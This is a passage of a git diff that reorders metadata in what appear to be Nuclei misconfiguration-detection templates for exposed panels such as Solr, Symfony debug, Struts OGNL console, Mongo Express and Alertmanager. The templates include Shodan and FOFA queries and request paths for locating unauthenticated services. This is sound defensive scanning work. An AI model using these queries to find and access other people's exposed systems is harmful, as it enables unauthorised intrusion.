b/http/misconfiguration/smokeping-grapher.yaml @@ -7,16 +7,16 @@ info: description: SmokePing Latency Page is exposed. reference: - https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448 + classification: + cpe: cpe:2.3:a:smokeping:smokeping:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"SmokePing Latency Page for Network Latency Grapher" - product: smokeping vendor: smokeping + product: smokeping + shodan-query: title:"SmokePing Latency Page for Network Latency Grapher" tags: misconfig,smokeping,latency,grapher - classification: - cpe: cpe:2.3:a:smokeping:smokeping:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml index 6d4e6b9082..fd116fc423 100644 --- a/http/misconfiguration/solr-query-dashboard.yaml +++ b/http/misconfiguration/solr-query-dashboard.yaml @@ -7,14 +7,14 @@ info: description: Solr's admin page was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5856 - metadata: - max-request: 2 - product: solr - vendor: apache - tags: solr,unauth,edb,misconfig - classification: cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: solr + tags: solr,unauth,edb,misconfig + http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a00463044022058d163ffc9449248324a57e16ddd712089600f3185d5266b7c78dd2f0b818d39022002d583d8ac54152a37cf356a19700170a74776e4b1da5ea8eb2e1b77a5de949b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022058d163ffc9449248324a57e16ddd712089600f3185d5266b7c78dd2f0b818d39022002d583d8ac54152a37cf356a19700170a74776e4b1da5ea8eb2e1b77a5de949b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml index 666bbd8565..c10111d2ae 100644 --- a/http/misconfiguration/sonarqube-projects-disclosure.yaml +++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml @@ -9,17 +9,17 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://github.com/deletescape/sloot + classification: + cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: sonarsource + product: sonarqube shodan-query: title:"Sonarqube" fofa-query: app="sonarQube-代码管理" - product: sonarqube - vendor: sonarsource tags: sonarqube,exposure,misconfig - classification: - cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: status: - 200 -# digest: 4a0a00473045022007a5c2766f7648947c60b9d94121e7d4c522fce141ab6513f1e74b4439e5c869022100e6096339fde4571b6d11b0a6aff6f84e658bead95452dcb7bf8e253ecd6f9c3f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022007a5c2766f7648947c60b9d94121e7d4c522fce141ab6513f1e74b4439e5c869022100e6096339fde4571b6d11b0a6aff6f84e658bead95452dcb7bf8e253ecd6f9c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index aacd516a5d..cb2ce59b65 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -7,16 +7,16 @@ info: description: SQL Server ReportViewer page exposed. reference: - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16 + classification: + cpe: cpe:2.3:a:microsoft:sql_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: inurl:"/Reports/Pages/Folder.aspx" - product: sql_server vendor: microsoft + product: sql_server + google-query: inurl:"/Reports/Pages/Folder.aspx" tags: misconfig,sql,report,exposure - classification: - cpe: cpe:2.3:a:microsoft:sql_server:*:*:*:*:*:*:*:* http: - raw: - | @@ -32,4 +32,5 @@ http: - "status_code_1 == 200 && status_code_2 != 401" - "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')" condition: and -# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index e6bfaef00f..e19b8ffc07 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -9,16 +9,16 @@ info: remediation: Restrict access to the struts console on the production server reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java + classification: + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Struts Problem Report" - product: struts vendor: apache + product: struts + shodan-query: html:"Struts Problem Report" tags: apache,struts,ognl,panel,misconfig - classification: - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml index 9f72409569..f06ea9f7e6 100644 --- a/http/misconfiguration/symfony-debug.yaml +++ b/http/misconfiguration/symfony-debug.yaml @@ -7,16 +7,16 @@ info: description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code. reference: - https://github.com/synacktiv/eos + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - shodan-query: http.html:"symfony Profiler" - product: symfony vendor: sensiolabs + product: symfony + shodan-query: http.html:"symfony Profiler" tags: symfony,debug,misconfig - classification: - cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/app_dev.php" stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -42,4 +43,5 @@ http: - 'debug mode is enabled.' - 'id="sfWebDebugSymfony"' condition: or -# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml index 4a6afb0e0d..f73df306bc 100644 --- a/http/misconfiguration/symfony-fragment.yaml +++ b/http/misconfiguration/symfony-fragment.yaml @@ -11,16 +11,16 @@ info: - https://medium.com/@m4cddr/how-i-got-rce-in-10-websites-26dd87441f22 - https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5 - https://github.com/ambionics/symfony-exploits + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"symfony Profiler" - product: symfony vendor: sensiolabs + product: symfony + shodan-query: http.html:"symfony Profiler" tags: config,exposure,symfony,misconfig - classification: - cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: - "(\"8b2f83102bc96e5068d36df80301a64d\" == md5(body)) || (\"4df206fbc337c398c3b669172934c8cb\" == md5(body))" condition: and -# digest: 490a0046304402202aae05b954b4e09d833cb11b5a201d4e5ecd6580bb6d79385fc3affcd8fae7fd022046c21c2cf4d84f67373859c47a19d36990e10c35abf35b91232125584d1591cd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202aae05b954b4e09d833cb11b5a201d4e5ecd6580bb6d79385fc3affcd8fae7fd022046c21c2cf4d84f67373859c47a19d36990e10c35abf35b91232125584d1591cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index 1d9780530b..2697e1adfa 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -7,16 +7,16 @@ info: description: Syncthing Dashboard is exposed. reference: - https://syncthing.net/ + classification: + cpe: cpe:2.3:a:syncthing:syncthing:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:'ng-app="syncthing"' - product: syncthing vendor: syncthing + product: syncthing + shodan-query: http.html:'ng-app="syncthing"' tags: misconfig,syncthing,exposure - classification: - cpe: cpe:2.3:a:syncthing:syncthing:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index f7db62d699..4ccdafa69e 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -7,16 +7,16 @@ info: description: Tasmota configuration is exposed. reference: - https://github.com/arendst/Tasmota + classification: + cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Tasmota" - product: tasmota vendor: tasmota_project + product: tasmota + shodan-query: title:"Tasmota" tags: misconfig,tasmota,exposure,config - classification: - cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +46,5 @@ http: group: 1 regex: - "Tasmota ([0-9.]+) " -# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/teslamate-unauth-access.yaml b/http/misconfiguration/teslamate-unauth-access.yaml index 27b2e97c98..b04ce96396 100644 --- a/http/misconfiguration/teslamate-unauth-access.yaml +++ b/http/misconfiguration/teslamate-unauth-access.yaml @@ -6,17 +6,17 @@ info: severity: medium description: | A misconfig in Teslamate allows unauthorized access to /settings endpoint. + classification: + cpe: cpe:2.3:a:teslamate_project:teslamate:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: teslamate_project + product: teslamate shodan-query: http.favicon.hash:-1478287554 fofa-query: title="teslamate" - product: teslamate - vendor: teslamate_project tags: misconfig,teslamate,unauth - classification: - cpe: cpe:2.3:a:teslamate_project:teslamate:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,4 @@ http: regex: - "([0-9.]+)" -# digest: 4b0a00483046022100a34f3dcd06fb844c5e881b8c8352b999dc24c0d0aa7b9f46bd01b87434a24f350221009cc0b519c750367431d73d8576f4815100cc5b7673c8d314a2d4fe7cf747538c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a34f3dcd06fb844c5e881b8c8352b999dc24c0d0aa7b9f46bd01b87434a24f350221009cc0b519c750367431d73d8576f4815100cc5b7673c8d314a2d4fe7cf747538c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index 61ceebd195..e2c10758c7 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -5,16 +5,16 @@ info: author: j4vaovo severity: medium description: ThinkPHP error is leaking sensitive info. + classification: + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="ThinkPHP" && title="System Error" - product: thinkphp vendor: thinkphp + product: thinkphp + fofa-query: app="ThinkPHP" && title="System Error" tags: thinkphp,misconfig,exposure - classification: - cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -50,4 +50,5 @@ http: - 500 - 404 condition: or -# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml index e793c21900..94156f14c7 100644 --- a/http/misconfiguration/tomcat-stacktraces.yaml +++ b/http/misconfiguration/tomcat-stacktraces.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Examine whether Tomcat stack traces are turned on by employing a designated problematic pattern. + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Apache Tomcat" - product: tomcat vendor: apache + product: tomcat + shodan-query: title:"Apache Tomcat" tags: misconfig,tech,tomcat,apache - classification: - cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +28,5 @@ http: - 'contains(body, "org.apache")' - status_code == 400 condition: and -# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml index 52f9c545e0..1e6ab922d9 100644 --- a/http/misconfiguration/typo3-composer.yaml +++ b/http/misconfiguration/typo3-composer.yaml @@ -8,16 +8,16 @@ info: The web application is based on Typo3 CMS. A sensitive file has been found. Access to such files must be restricted, as it may lead to disclosure of sensitive information about the web application. reference: - https://docs.typo3.org/c/typo3/cms-core/main/en-us/Changelog/9.0/Breaking-83302-ComposerRestrictsInstallationOfTypo3cms.html + classification: + cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "X-TYPO3-Parsetime: 0ms" - product: typo3 vendor: typo3 + product: typo3 + shodan-query: "X-TYPO3-Parsetime: 0ms" tags: typo3,cms,exposure,misconfig - classification: - cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e69bb1d2924aaee4f18b3631506ae7ea6cda7c6303d4b3b2bb1d90b25eb5b26602200bbb81912d4e81d25a97ff86d41ef64e1ab72943199a0e30e32fbe754b63d485:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e69bb1d2924aaee4f18b3631506ae7ea6cda7c6303d4b3b2bb1d90b25eb5b26602200bbb81912d4e81d25a97ff86d41ef64e1ab72943199a0e30e32fbe754b63d485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml index 95cf35189b..a72ffc8777 100644 --- a/http/misconfiguration/typo3-debug-mode.yaml +++ b/http/misconfiguration/typo3-debug-mode.yaml @@ -5,16 +5,16 @@ info: author: tess severity: low description: TYPO3 Debug Mode is enabled. + classification: + cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"TYPO3 Exception" - product: typo3 vendor: typo3 + product: typo3 + shodan-query: http.title:"TYPO3 Exception" tags: typo3,debug,misconfig - classification: - cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml index fe895220fa..6a2b6a40b0 100644 --- a/http/misconfiguration/unauth-apache-kafka-ui.yaml +++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml @@ -8,16 +8,16 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/apache-kafka-unauthorized-access-vulnerability - https://github.com/provectus/kafka-ui + classification: + cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.title:"UI for Apache Kafka" - product: kafka vendor: apache + product: kafka + shodan-query: http.title:"UI for Apache Kafka" tags: misconfig,apache,kafka,unauth,exposure - classification: - cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 490a0046304402206d35f02707c9544a53b20bc75ffe681278c4116d63151a40944ed0bdb8d6f92b0220316ea327980abf75df261bd4a3e23df0e70300cba1fb2b70499c20308aacf543:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d35f02707c9544a53b20bc75ffe681278c4116d63151a40944ed0bdb8d6f92b0220316ea327980abf75df261bd4a3e23df0e70300cba1fb2b70499c20308aacf543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauth-celery-flower.yaml b/http/misconfiguration/unauth-celery-flower.yaml index c7ea9ebd3a..acc7542112 100644 --- a/http/misconfiguration/unauth-celery-flower.yaml +++ b/http/misconfiguration/unauth-celery-flower.yaml @@ -6,15 +6,15 @@ info: severity: high description: | Celery Flower was able to be accessed with no authentication requirements in place. - metadata: - max-request: 1 - shodan-query: http.favicon.hash:-374133142 - product: flower - vendor: flower_project - tags: celery,flower,unauth,misconfig - classification: cpe: cpe:2.3:a:flower_project:flower:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: flower_project + product: flower + shodan-query: http.favicon.hash:-374133142 + tags: celery,flower,unauth,misconfig + http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauth-etherpad.yaml b/http/misconfiguration/unauth-etherpad.yaml index de89986046..e452726f60 100644 --- a/http/misconfiguration/unauth-etherpad.yaml +++ b/http/misconfiguration/unauth-etherpad.yaml @@ -6,16 +6,16 @@ info: severity: low description: | Finds Etherpad instances that allow adding new notes without authentication. + classification: + cpe: cpe:2.3:a:etherpad:etherpad:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"index.createOpenPad" - product: etherpad vendor: etherpad + product: etherpad + shodan-query: http.html:"index.createOpenPad" tags: etherpad,misconfig,unauth - classification: - cpe: cpe:2.3:a:etherpad:etherpad:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 490a00463044022030cf89dd6dab15de5f6f97d89f3339351f94550f2ce4d86fc477a526e3825cc502204513585aa41b3fd6b4103597748ffbdd14eb2b42157551e0647d6c49b0861d2f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022030cf89dd6dab15de5f6f97d89f3339351f94550f2ce4d86fc477a526e3825cc502204513585aa41b3fd6b4103597748ffbdd14eb2b42157551e0647d6c49b0861d2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml index 4d8eefef4f..3897efce93 100644 --- a/http/misconfiguration/unauth-ldap-account-manager.yaml +++ b/http/misconfiguration/unauth-ldap-account-manager.yaml @@ -5,16 +5,16 @@ info: author: tess severity: medium description: LDAP Account Manager is exposed to external users. + classification: + cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"LDAP Account Manager" - product: ldap_account_manager vendor: ldap-account-manager + product: ldap_account_manager + shodan-query: http.title:"LDAP Account Manager" tags: ldap,misconfig,unauth - classification: - cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml index 2b977f0b60..e2c2f5c457 100644 --- a/http/misconfiguration/unauth-mercurial.yaml +++ b/http/misconfiguration/unauth-mercurial.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: high description: Mercurial repositories index is disclosed. + classification: + cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Mercurial repositories index" - product: mercurial vendor: mercurial + product: mercurial + shodan-query: html:"Mercurial repositories index" tags: misconfig,unauth,mercurial - classification: - cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml index 5b08cfa491..de5de9d51c 100644 --- a/http/misconfiguration/unauthenticated-alert-manager.yaml +++ b/http/misconfiguration/unauthenticated-alert-manager.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: high description: Alert Manager was able to be accessed with no authentication requirements in place. - metadata: - max-request: 1 - shodan-query: http.title:"Alertmanager" - product: alertmanager - vendor: prometheus - tags: unauth,alertmanager,misconfig - classification: cpe: cpe:2.3:a:prometheus:alertmanager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: prometheus + product: alertmanager + shodan-query: http.title:"Alertmanager" + tags: unauth,alertmanager,misconfig + http: - method: GET path: @@ -29,4 +29,4 @@ http: status: - 200 -# digest: 4b0a00483046022100dab26c880087c30cdab09df15c9162594c0236086943481a0651b06114fa4d3e022100c434ec5e6f764b02bf0e37e4ebb1e9d78ce89706c9ace105a4dae85a21e8b125:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dab26c880087c30cdab09df15c9162594c0236086943481a0651b06114fa4d3e022100c434ec5e6f764b02bf0e37e4ebb1e9d78ce89706c9ace105a4dae85a21e8b125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml index 4e356dd670..6de07c9890 100644 --- a/http/misconfiguration/unauthenticated-mongo-express.yaml +++ b/http/misconfiguration/unauthenticated-mongo-express.yaml @@ -7,16 +7,16 @@ info: description: Mongo Express was able to be access with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5684 + classification: + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: title:"Home - Mongo Express" - product: mongo-express vendor: mongo-express_project + product: mongo-express + shodan-query: title:"Home - Mongo Express" tags: mongo,unauth,edb,misconfig - classification: - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4b0a00483046022100e283c5bbedab8b07d13294327dc2704640614f9b265ce975f37ee69ef16692fb022100f21bb9bb35c1cbafb9bbce1f5e34c779a9b7baaf19f36d7747188bf427235079:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e283c5bbedab8b07d13294327dc2704640614f9b265ce975f37ee69ef16692fb022100f21bb9bb35c1cbafb9bbce1f5e34c779a9b7baaf19f36d7747188bf427235079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml index 7a6ca2b072..48af349c41 100644 --- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml +++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml @@ -5,17 +5,17 @@ info: author: ritikchaddha severity: high description: H3C server was able to be accessed with no authentication requirements in place. + classification: + cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: h3c + product: secpath_f5060 shodan-query: http.html:"H3C-SecPath-运维审计系统" fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - product: secpath_f5060 - vendor: h3c tags: h3c,default-login,unauth,misconfig - classification: - cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/untangle-admin-setup.yaml 